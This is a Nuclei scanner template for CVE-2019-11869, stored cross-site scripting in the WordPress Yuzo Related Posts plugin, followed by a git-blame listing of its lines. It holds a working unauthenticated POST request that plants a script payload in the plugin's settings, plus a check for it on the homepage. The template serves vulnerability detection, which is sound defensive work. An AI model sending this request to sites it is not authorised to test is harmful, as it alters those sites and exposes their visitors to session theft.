nuclei-templates/http/cves/2019/CVE-2019-11869.yaml

id: CVE-2019-11869

info:
  name: WordPress Yuzo <5.12.94 - Cross-Site Scripting
  author: ganofins
  severity: medium
  description: |
    WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
    because it mistakenly expects that is_admin() verifies that the
    request comes from an admin user (it actually only verifies that the
    request is for an admin page). An unauthenticated attacker can consequently inject
    a payload into the plugin settings, such as the
    yuzo_related_post_css_and_style setting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
    - https://wpscan.com/vulnerability/9254
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
    - https://wpvulndb.com/vulnerabilities/9254
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11869
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-11869
    cwe-id: CWE-79
    epss-score: 0.00291
    epss-percentile: 0.65616
    cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: yuzopro
    product: yuzo
    framework: wordpress
  tags: wpscan,cve,cve2019,wordpress,wp-plugin,xss,yuzopro

http:
  - raw:
      - |
        POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        yuzo_related_post_css_and_style=</style><script>alert(0);</script>
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<script>alert(0);</script>")'

      - type: dsl
        dsl:
          - "contains(tolower(header_2), 'text/html')"
# digest: 4a0a00473045022010577c9f3b6fb59d7f8b9d77c9d9aabba0d301a943e1750c3dbfe29bd71cf6c6022100c9885b608a0d2fb07affa5a859f5acb8c1b78c31434974124e7c14f916ae12c1:922c64590222798bb761d5b6d8e72950
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-11869`
Add CVE-2019-11869 XSS in Yuzo Related Posts plugin before 5.12.94 2020-12-25 08:21:48 +00:00
			`info:`
Dashboard Content Enhancements (#5077) Dashboard Content Enhancements 2022-08-12 00:45:50 +00:00			`name: WordPress Yuzo <5.12.94 - Cross-Site Scripting`
Add CVE-2019-11869 XSS in Yuzo Related Posts plugin before 5.12.94 2020-12-25 08:21:48 +00:00			`author: ganofins`
			`severity: medium`
			`description: \|`
Dashboard Content Enhancements (#5077) Dashboard Content Enhancements 2022-08-12 00:45:50 +00:00			`WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting`
Add CVE-2019-11869 XSS in Yuzo Related Posts plugin before 5.12.94 2020-12-25 08:21:48 +00:00			`because it mistakenly expects that is_admin() verifies that the`
			`request comes from an admin user (it actually only verifies that the`
Dashboard Content Enhancements (#5077) Dashboard Content Enhancements 2022-08-12 00:45:50 +00:00			`request is for an admin page). An unauthenticated attacker can consequently inject`
Add CVE-2019-11869 XSS in Yuzo Related Posts plugin before 5.12.94 2020-12-25 08:21:48 +00:00			`a payload into the plugin settings, such as the`
			`yuzo_related_post_css_and_style setting.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`remediation: \|`
			`Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Add CVE-2019-11869 XSS in Yuzo Related Posts plugin before 5.12.94 2020-12-25 08:21:48 +00:00			`- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild`
			`- https://wpscan.com/vulnerability/9254`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/`
			`- https://wpvulndb.com/vulnerabilities/9254`
Dashboard Content Enhancements (#5077) Dashboard Content Enhancements 2022-08-12 00:45:50 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2019-11869`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2019-11869`
			`cwe-id: CWE-79`
TemplateMan Update [Mon Nov 20 10:14:14 UTC 2023] :robot: 2023-11-20 10:14:14 +00:00			`epss-score: 0.00291`
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot: 2023-12-12 11:07:52 +00:00			`epss-percentile: 0.65616`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:::::wordpress::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: yuzopro`
			`product: yuzo`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`framework: wordpress`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: wpscan,cve,cve2019,wordpress,wp-plugin,xss,yuzopro`
Add CVE-2019-11869 XSS in Yuzo Related Posts plugin before 5.12.94 2020-12-25 08:21:48 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Add CVE-2019-11869 XSS in Yuzo Related Posts plugin before 5.12.94 2020-12-25 08:21:48 +00:00			`- raw:`
			`- \|`
			`POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`yuzo_related_post_css_and_style=</style><script>alert(0);</script>`
			`- \|`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
updating rules 2020-12-25 09:56:00 +00:00			`- type: dsl`
			`dsl:`
removing redundant boolean check 2021-03-24 23:28:50 +00:00			`- 'contains(body_2, "<script>alert(0);</script>")'`
updating rules 2020-12-25 09:56:00 +00:00
			`- type: dsl`
			`dsl:`
removed deprecated header syntax with latest one 2023-06-19 21:10:30 +00:00			`- "contains(tolower(header_2), 'text/html')"`
Auto Template Signing [Fri Dec 29 09:30:43 UTC 2023] :robot: 2023-12-29 09:30:44 +00:00			`# digest: 4a0a00473045022010577c9f3b6fb59d7f8b9d77c9d9aabba0d301a943e1750c3dbfe29bd71cf6c6022100c9885b608a0d2fb07affa5a859f5acb8c1b78c31434974124e7c14f916ae12c1:922c64590222798bb761d5b6d8e72950`